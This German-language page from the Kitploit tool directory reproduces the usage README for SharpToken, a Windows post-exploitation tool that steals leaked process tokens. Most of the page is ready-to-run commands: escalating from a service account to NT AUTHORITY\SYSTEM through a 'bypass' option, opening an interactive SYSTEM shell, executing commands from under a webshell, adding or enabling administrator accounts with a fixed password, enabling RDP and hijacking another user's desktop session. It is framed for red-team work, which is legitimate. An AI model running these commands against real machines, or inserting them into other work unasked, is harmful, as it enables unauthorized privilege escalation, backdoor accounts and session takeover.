Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
SharpToken — Windows-Token-Diebstahl und Privilegienausweitung-Tool, das durchgesickerte Token von Prozessen stiehlt, SYSTEM-Level-Zugriff, Benutzerimitation und Desktop-Wechsel ohne Passwörter ermöglicht. | Kitploit
Tools/GitHubGitHub/beichendream/sharptoken
Privilege EscalationLaterale BewegungPost-ExploitationRed Teaming
GitHubbeichendream/sharptoken

SharpToken

Windows-Token-Diebstahl und Privilegienausweitung-Tool, das durchgesickerte Token von Prozessen stiehlt, SYSTEM-Level-Zugriff, Benutzerimitation und Desktop-Wechsel ohne Passwörter ermöglicht.

Repository anzeigen
49668vor 2 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

SharpToken

Während der Lateral Movement bei Red Teams müssen wir oft die Berechtigungen anderer Benutzer stehlen. Unter dem Schutz moderner EDR ist es schwierig, Mimikatz zu verwenden, um andere Benutzerberechtigungen zu erlangen. Wenn der Zielbenutzer keinen aktiven Prozess hat, können wir auch nicht "OpenProcessToken" nutzen, um ein Token zu stehlen.

SharpToken ist ein Tool zur Ausnutzung von Token-Leaks. Es kann durchgesickerte Tokens aus allen Prozessen im System finden und verwenden. Wenn Sie ein Benutzer mit niedrigen Dienstberechtigungen sind, können Sie es sogar nutzen, um auf "NT AUTHORITY\SYSTEM"-Berechtigungen zu upgraden, und Sie können auf den Desktop des Zielbenutzers wechseln, um mehr zu tun, ohne das Passwort des Zielbenutzers zu kennen. ..

image

Verwendung

root@kitploit:~
SharpToken By BeichenDream
=========================================================

Github : https://github.com/BeichenDream/SharpToken

If you are an NT AUTHORITY\NETWORK SERVICE user then you just need to add the bypass parameter to become an NT AUTHORIT\YSYSTEM
e.g.
SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami" bypass


Usage:

SharpToken COMMAND arguments



COMMANDS:

        list_token [process pid]        [bypass]

        list_all_token [process pid] [bypass]

        add_user    <username> <password> [group] [domain] [bypass]

        enableUser <username> <NewPassword> [NewGroup] [bypass]

        delete_user <username> [domain] [bypass]

        execute <tokenUser> <commandLine> [Interactive] [bypass]

        enableRDP [bypass]

        tscon <targetSessionId> [sourceSessionId] [bypass]


example:
    SharpToken list_token
    SharpToken list_token bypass
    SharpToken list_token 6543
    SharpToken add_user admin Abcd1234! Administrators
    SharpToken enableUser Guest Abcd1234! Administrators
    SharpToken delete_user admin
    SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami"
    SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami" bypass
    SharpToken execute "NT AUTHORITY\SYSTEM" cmd true
    SharpToken execute "NT AUTHORITY\SYSTEM" cmd true bypass
    SharpToken tscon 1

Erweiterte Berechtigungen

Neben der üblichen Token-Diebstahl-Berechtigungserhöhung unterstützt SharpToken auch das Erlangen von Tokens mit Integrität durch Bypass.

Wenn Sie ein NT AUTHORITY/NETWORK SERVICE-Benutzer sind und den Bypass-Parameter hinzufügen, stiehlt SharpToken das System von RPCSS, also eine bedingungslose NT AUTHORITY\NETWORK SERVICE zu NT AUTHORITY\SYSTEM.

image

ListToken

Die aufgelisteten Informationen umfassen SID, LogonDomain, UserName, Session, LogonType, TokenType, TokenHandle (Handle des Tokens nach Duplizierung), TargetProcessId (Prozess, aus dem das Token stammt), TargetProcessToken (Handle des Tokens im Quellprozess), Groups (Gruppe, in der sich der Token-Benutzer befindet).

root@kitploit:~
SharpToken list_token

image

Tokens aus dem angegebenen Prozess auflisten

root@kitploit:~
SharpToken list_token 468

image

Interaktive Shell erhalten

root@kitploit:~
execute "NT AUTHORITY\SYSTEM" cmd true

image

Befehlsausführungsergebnisse abrufen (ausgeführt unter Webshell)

root@kitploit:~
SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami"

image

Mit dem gestohlenen Token einen Admin-Benutzer erstellen

root@kitploit:~
SharpToken add_user admin Abcd1234! Administrators

Mit dem gestohlenen Token einen Admin-Benutzer aktivieren

root@kitploit:~
    SharpToken enableUser Guest Abcd1234! Administrators

Mit dem gestohlenen Token einen Benutzer löschen

root@kitploit:~
    SharpToken delete_user admin

Mit dem gestohlenen Token auf den Desktop des Ziels wechseln

Wobei 1 der Desktop des Zielbenutzers und 2 der Desktop ist, den wir empfangen möchten.

root@kitploit:~
    SharpToken tscon 1 2

LIZENZ

GNU General Public License

Referenzen

https://www.tiraniddo.dev/2020/04/sharing-logon-session-little-too-much.html

https://github.com/decoder-it/NetworkServiceExploit

https://github.com/FSecureLABS/incognito

https://github.com/chroblert/JCTokenUtil

Tool herunterladen